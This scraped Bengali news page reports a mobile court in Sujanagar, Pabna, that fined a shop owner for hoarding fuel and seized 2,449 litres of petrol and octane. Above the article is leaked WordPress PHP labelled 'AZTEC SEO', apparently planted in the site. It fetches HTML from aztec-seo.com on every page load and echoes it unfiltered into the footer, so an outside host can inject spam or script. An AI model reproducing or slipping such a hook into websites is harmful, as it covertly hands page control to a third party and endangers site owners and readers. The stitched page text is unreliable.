/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সুজানগরে ২৪৪৯ লিটার জ্বালানি তেল জব্দ | Dhaka Sky News

রাজধানীতে পুলিশের বিশেষ অভিযানে গ্রেফতার ২৫

আগের সংবাদ

ট্রেন থেকে পড়ে অল্পের জন্য প্রাণে বাঁচলেন পুলিশ সদস্য

পরের সংবাদ

সুজানগরে ২৪৪৯ লিটার জ্বালানি তেল জব্দ

messenger sharing buttonসুজানগরে ২৪৪৯ লিটার জ্বালানি তেল জব্দ

জব্দ করা পেট্রল প্রতি মোটরসাইকেলে সর্বোচ্চ পাঁচ লিটার করে ন্যায্যমূল্যে খোলাবাজারে বিক্রি করা হয়। ছবি: যুগান্তর

পাবনার সুজানগর উপজেলায় অবৈধভাবে পেট্রল ও অকটেন মজুত করে অতিরিক্ত দামে বিক্রির অভিযোগে এক দোকান মালিককে জরিমানা করেছেন ভ্রাম্যমাণ আদালত।  শুক্রবার (২৭ মার্চ) দিবাগত রাতে সুজানগর উপজেলা নির্বাহী কর্মকর্তা (ইউএনও) ও নির্বাহী ম্যাজিস্ট্রেট মীর রাশেদুজ্জামান রাশেদের নেতৃত্বে সুজানগর পৌরবাজারে এ অভিযান পরিচালনা করা হয়।

অভিযান পরিচালনাকালে দোকানে অবৈধভাবে পেট্রল ও অকটেন মজুত রেখে বেশি দামে বিক্রির প্রমাণ পাওয়া গেলে দোকান মালিক মো. মিরান হোসেনকে পাঁচ হাজার টাকা জরিমানা করা হয়।  অভিযান চলাকালে ১ হাজার ৯০৪ লিটার পেট্রল ও ৫৪৫ লিটার অকটেন জব্দ করা হয়। জব্দ করা পেট্রল প্রতি মোটরসাইকেলে সর্বোচ্চ পাঁচ লিটার করে প্রতি লিটার ১১৬ টাকা এবং প্রতি লিটার অকটেন ১২০ টাকা দরে ন্যায্যমূল্যে খোলাবাজারে বিক্রি করা হয়।

ইউএনও মীর রাশেদুজ্জামান রাশেদ বলেন, পেট্রল ও অকটেন মজুত করে অতিরিক্ত দামে বিক্রির অভিযোগে একজনকে জরিমানা করা হয়েছে।  উদ্ধার করা পেট্রল ও অকটেন ন্যায্যমূল্যে বিক্রি করা হয়েছে। মোবাইল কোর্ট পরিচালনাকারী আদালত কর্তৃক বিক্রির সর্বমোট ২ লাখ ৮৬ হাজার ২৬৪ টাকা সরকারি কোষাগারে জমা প্রদানের আদেশ দেওয়া হয়েছে।

তিনি আরও জানান, কোথাও অবৈধভাবে পেট্রল, অকটেন ও ডিজেল মজুতের তথ্য থাকলে উপজেলা প্রশাসনকে জানিয়ে সহযোগিতা করার জন্য স্থানীয়দের প্রতি আহ্বান জানানো হয়েছে।